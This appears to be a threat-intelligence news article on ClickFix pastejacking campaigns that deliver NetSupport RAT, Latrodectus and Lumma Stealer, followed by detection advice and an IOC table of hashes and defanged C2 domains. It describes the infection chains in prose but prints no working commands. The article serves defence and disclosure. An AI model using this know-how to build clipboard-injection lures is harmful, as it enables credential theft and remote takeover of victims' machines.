Attackers are increasingly leveraging the ClickFix social engineering technique to distribute potent malware families, including NetSupport RAT, Latrodectus, and Lumma Stealer.
This method, which emerged prominently in recent months, tricks users into executing malicious commands under the guise of resolving common computer issues like performance glitches or verification prompts.
By hijacking the clipboard through JavaScript injection a tactic known as pastejacking threat actors embed obfuscated PowerShell scripts or commands that victims unwittingly paste into system interfaces such as the Run dialog (Win+R) or terminal (Win+X).
This bypasses traditional security controls, as there’s no direct exploit or malicious download; instead, the user manually triggers the infection via trusted shells like cmd.exe or powershell.exe.
Palo Alto Networks’ Unit 42 has responded to nearly a dozen incidents in 2025 where ClickFix served as the initial access vector, affecting diverse sectors from high technology and financial services to manufacturing, utilities, and government entities.
The technique’s simplicity allows rapid deployment, enabling full organizational takeovers through credential theft, data exfiltration, or ransomware deployment.
Researchers have observed a surge in weekly infections since early 2025, with variants masquerading as legitimate services like DocuSign and Okta to evade detection.
In-Depth Analysis of Malware Campaigns
Delving into specific campaigns, one prolific operation in May 2025 targeted industries such as healthcare, legal services, telecommunications, retail, and mining by distributing NetSupport RAT via fake landing pages on domains like docusign.sa[.]com and oktacheck.it[.]com.
These lures, suspected to utilize ClearFake infrastructure a malicious JavaScript framework embedded in compromised sites inject encoded PowerShell commands that download a ZIP archive containing jp2launcher.exe, a legitimate Java Runtime Environment component.
This sideloads a malicious DLL (msvcp140.dll), which then fetches and executes NetSupport RAT (client32.exe) from encrypted binaries, establishing remote access.
Similarly, Latrodectus campaigns from March to April 2025 shifted to ClickFix, redirecting users from hacked websites to verification pages that paste curl.exe commands downloading JavaScript droppers.
These, obfuscated with junk JSON variables, retrieve MSI payloads that sideload libcef.dll, injecting shellcode for persistence and potential follow-on payloads like infostealers.
In April 2025, Lumma Stealer attacks intensified, using typosquatted domains like iplogger[.]co to deliver MSHTA commands that fetch encoded PowerShell scripts, ultimately deploying PartyContinued.exe.
This extractor unpacks a CAB file (Boat.pst) to construct an AutoIt3 script engine (Slovenia[.]com), executing Lumma as an .a3x file for credential harvesting and exfiltration to C2 servers like sumeriavgv[.]digital.
These chains highlight evolving obfuscation, from Russian-commented scripts to dynamic R2.dev-hosted payloads, impacting automotive, energy, IT, and software sectors.
Mitigation Strategies
To counter these threats, threat hunters can scrutinize artifacts like the RunMRU registry key (HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU) for suspicious entries involving obfuscated commands or downloads from untrusted domains.
For Win+X variants, monitor Event ID 4688 for powershell.exe spawned by explorer.exe, correlated with Event ID 4663 accesses to WinX folders, alongside elevated shell sessions post-login and anomalous child processes like mshta.exe or rundll32.exe.
Clipboard monitoring can flag paste events preceding executions. Palo Alto Networks’ Advanced WildFire, URL Filtering, DNS Security, Cortex XDR, and XSIAM provide robust defenses by detecting clipboard injections and behavioral anomalies.
Organizations should educate users on these lures while implementing proactive monitoring. For suspected compromises, contact Unit 42’s incident response team.
Indicators of Compromise (IOCs)
| Category | Indicator | Description |
|---|---|---|
| SHA256 Hashes (Lumma Stealer) | 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef | PartyContinued.exe |
| 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7 | Boat.pst (CAB file) | |
| SHA256 Hashes (Latrodectus) | 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1 | libecf.dll |
| 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293 | PowerShell Downloader | |
| SHA256 Hashes (NetSupport RAT) | 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D | data_3.bin (XOR encrypted stager) |
| 9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288 | data_4.bin (XOR encrypted shellcode) | |
| CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527 | msvcp140.dll (loader) | |
| 506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a | libsqlite3-0.dll | |
| 3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7 | C:ProgramDataSecurityCheck_v1client32.exe | |
| Mutex (NetSupport RAT) | nx0kFgSPY8SDVhOMjmNgW | Loader mutex |
| C2 Domains (NetSupport RAT) | mh-sns[.]com, lasix20[.]com | Command-and-control domains |
Get Free Ultimate SOC Requirements Checklist Before you build, buy, or switch your SOC for 2025 - Download Now
